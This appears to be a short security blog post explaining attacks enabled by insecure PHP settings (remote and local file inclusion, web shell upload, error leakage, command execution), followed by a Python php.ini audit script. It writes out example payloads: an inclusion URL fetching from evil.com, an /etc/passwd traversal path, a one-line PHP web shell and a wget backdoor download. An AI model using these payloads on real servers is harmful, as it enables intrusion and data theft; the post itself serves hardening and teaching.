Sunday, March 15, 2026 • Sachin Prajapati

Attacks Caused by Insecure PHP Configuration


2. Real-World Attacks Caused by Insecure PHP Configuration

Many real-world breaches occurred because of insecure PHP settings.


1. Remote File Inclusion (RFI)

Occurs when the application includes a file from a remote URL that the attacker controls.

Example vulnerable code:

include($_GET['page']);

Attack:

http://site.com/index.php?page=http://evil.com/shell.php

If allow_url_include = On, PHP fetches the remote file and executes it, so the attacker runs their own code on the server.


2. Local File Inclusion (LFI)

Attackers access sensitive files on the server.

Example attack:

http://site.com/index.php?page=../../../../etc/passwd

This returns the contents of /etc/passwd, which reveals the system's user accounts.


3. Web Shell Upload Attack

Attackers upload malicious PHP files.

Example file:

<?php system($_GET['cmd']); ?>

Then access:

site.com/uploads/shell.php?cmd=whoami

The attacker can now run commands on the server through the uploaded file.


4. Information Leakage

When display_errors = On, attackers see errors like:

Fatal error in /var/www/html/config.php

This reveals:

  • server paths

  • configuration files

  • database credentials


5. Server Takeover via Command Execution

If dangerous functions are enabled:

exec()
system()
shell_exec()

Attackers can execute commands such as:

wget http://evil.com/backdoor.sh
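
A defender-side check for the settings named in the sections above, added here as an example and not part of the original post: it parses php.ini text and reports allow_url_include, display_errors, and any of exec/system/shell_exec missing from disable_functions. The function names parse_ini and audit and both sample files are constructed for illustration.

```python
# Directives and functions below are the ones named in the sections above.
DANGEROUS_FUNCS = ("exec", "system", "shell_exec")
TRUTHY = {"1", "on", "true", "yes"}

def parse_ini(text):
    """Return {directive: value}; a later assignment overrides an earlier one."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()   # strip php.ini ';' comments
        if not line or line.startswith("[") or "=" not in line:
            continue                           # blank, [section] or malformed
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip('"')
    return settings

def audit(text):
    """Return one finding per risky setting found in php.ini text."""
    s = parse_ini(text)
    findings = []
    # allow_url_include defaults to Off when the directive is absent.
    if s.get("allow_url_include", "Off").lower() in TRUTHY:
        findings.append("allow_url_include=On: include() will fetch remote URLs")
    # display_errors defaults to "1" when absent; "stdout" also shows errors.
    if s.get("display_errors", "1").lower() in TRUTHY | {"stdout"}:
        findings.append("display_errors=On: error text and paths reach the client")
    disabled = {f.strip().lower()
                for f in s.get("disable_functions", "").split(",") if f.strip()}
    enabled = [f for f in DANGEROUS_FUNCS if f not in disabled]
    if enabled:
        findings.append("not in disable_functions: " + ", ".join(enabled))
    return findings

# Constructed sample files, not taken from any real server.
WEAK_INI = """[PHP]
; development leftovers
allow_url_include = On
display_errors = On
disable_functions =
"""
HARDENED_INI = """[PHP]
allow_url_include = Off
display_errors = Off
log_errors = On
disable_functions = exec,system,shell_exec
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini) or "no findings")
```

The check reads only the file text it is given, so values changed at runtime or in per-directory configuration are not seen.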